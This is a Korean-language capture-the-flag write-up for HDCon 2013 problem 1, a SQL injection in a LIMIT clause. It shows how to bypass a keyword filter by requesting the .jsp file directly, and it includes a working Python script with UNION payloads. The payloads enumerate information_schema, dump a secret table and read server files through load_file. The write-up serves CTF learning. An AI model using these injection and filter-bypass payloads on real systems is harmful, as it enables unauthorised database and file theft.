[HDCon 2013] 1번 문제 write up

1번 문제는 sql injection 문제였다.

injection 위치는 limit 부분이었다.

limit 부분에 인젝션이 가능할때는 union 인젝션만 가능하다고 알고 있었고, 이게 맞는듯 하다.

그래서 '(', select, from 등이 필터링이 되어있다는걸 알았을때는 멘붕이었고, 내가 잘못 알고 있나 해서 검색을 엄청나게 했다.

하지만, 이 문제는 좀 다른 방향으로 접근해야 했다.

문제파일의 확장자는 'do' 였다. do 확장자에 대해 검색해보면, do 확장자에서 jsp를 불러온다는걸 알수있다.

그래서 students.do 대신 students.jsp로 요청을 하면 ,select의 필터링이 풀린다. 

(즉, do에서 필터링을 하고있었다는걸 알수있다.)

그 후에는 간단한 union 인젝션이다.

import httplib,urllib;
import time
 
conn = httplib.HTTPConnection("118.107.172.213",8889)
conn.connect()
 
# id,name,age,sex,email,title,campus
#query = "12) union (select 0,table_name,0,0x41,0x41,0x41,0x41 from information_schema.tables where table_schema =0x6b6973616864636f6e31); # "
#query = "12) union (select 0,column_name,0,0x41,0x41,0x41,0x41 from information_schema.columns where table_name=0x736563726574); # "
#query = "1) union (select 0,flag,0,0x41,0x41,0x41,0x41 from secret); # "
query = "1) union (select 0,load_file(0x2f7661722f6c69622f6d7973716c2f464c4147),0,0x41,0x41,0x41,0x41); # "
#query = "12) union (select 0,database(),0,0x41,0x41,0x41,0x41); # "
print query
params = urllib.urlencode({'show':query})
#params = params.replace('select','%u0073elect')
print params
conn.putrequest('GET','/kisaHdconWeb1/students.jsp?'+params)
conn.endheaders()
response = conn.getresponse()
data = response.read()
conn.close()
#print data[1000:len(data)-800]
print data